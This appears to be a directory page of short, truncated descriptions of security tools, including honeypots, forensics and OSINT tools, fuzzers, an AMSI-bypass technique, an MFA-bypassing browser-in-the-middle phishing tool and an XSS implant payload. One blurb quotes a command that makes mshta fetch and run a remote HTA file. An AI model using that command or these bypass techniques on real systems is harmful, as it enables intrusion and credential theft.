The pentester's Swiss knife
SentryPeer A distributed list of bad IP addresses and phone numbers collected via a SIP Honeypot. This is basically a fraud detection tool. It lets bad actors try to make phone calls and...
ShellcodeGenZ takes your commands (like mshta.exe http://192.168.0.1/azi.hta) and turns ’em into shellcode that’s ready to flex. It hunts down bad chars (like 0x0a, 0x0b, or the default 0x00), lets you yeet ’em manually or auto...
Digital Forensics Lab & Shared Cyber Forensic Intelligence Repository. Features of Repository: Interactive Digital Forensics Labs: Tailored for students and faculty engagement. Linux-Centric Lab Environment: Utilizes Kali Linux exclusively for all labs. Visual Learning Support: Each lab...
Telerecon Telerecon is a comprehensive OSINT reconnaissance framework for researching, investigating, and scraping Telegram. For example: Input a target username, and Telerecon efficiently crawls across multiple chats gathering profile metadata, account activity, and user...
EntraFalcon is a PowerShell-based assessment tool for pentesters, security analysts, and system administrators to evaluate the security posture of a Microsoft Entra ID environment. Designed for ease of use, EntraFalcon runs on PowerShell 5.1...
This technique exploits the COM-level mechanics AMSI uses when delegating scan requests to antivirus (AV) providers through RPC. By hooking into the NdrClientCall3 function—used internally by the RPC runtime to marshal and dispatch function...
ntfstool NTFSTool is a forensic tool to play with disks and NTFS volumes. It supports reading partition info (mbr, partition table, vbr) but also information on bitlocker encrypted partition (fve). See examples below to...
fuzzuf fuzzuf (fuzzing unification framework) is a fuzzing framework with its own DSL to describe a fuzzing loop by constructing building blocks of fuzzing primitives. Why use fuzzuf? fuzzuf enables a flexible definition of a fuzzing loop...
CuddlePhish Weaponized multi-user browser-in-the-middle (BitM) for penetration testers. This attack can be used to bypass multi-factor authentication on many high-value web applications. It even works for applications that do not use session tokens, and...
Apepe Apepe is a Python tool developed to help pentesters and red teamers easily get information from the target app. This tool will extract basic pieces of information such as the package name if...
T-Pot – The All In One Honeypot Platform T-Pot is based on the Debian (Stable) network installer. The honeypot daemons as well as other support components are dockered. This allows T-Pot to run multiple honeypot...
Caracal Caracal is a static analyzer tool over the SIERRA representation for Starknet smart contracts. Features: Detectors to detect vulnerable Cairo code; Printers to report information; Taint analysis; Data flow analysis framework; Easy to...
CSIRT-Collect A PowerShell script to collect memory and (triage) disk forensics for incident response investigations. The script leverages a network share, from which it will access and copy the required executables and subsequently upload...
honeypots 30 low-high level honeypots in a single PyPI package for monitoring network traffic, bot activities, and username/password credentials. The honeypots respond back, non-blocking, can be used as objects, or called directly...
JS-Tap JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post-exploitation implant. The payload does...
IPED Digital Forensic Tool IPED is open-source software that can be used to process and analyze digital evidence, often seized at crime scenes by law enforcement or in a corporate investigation by private examiners....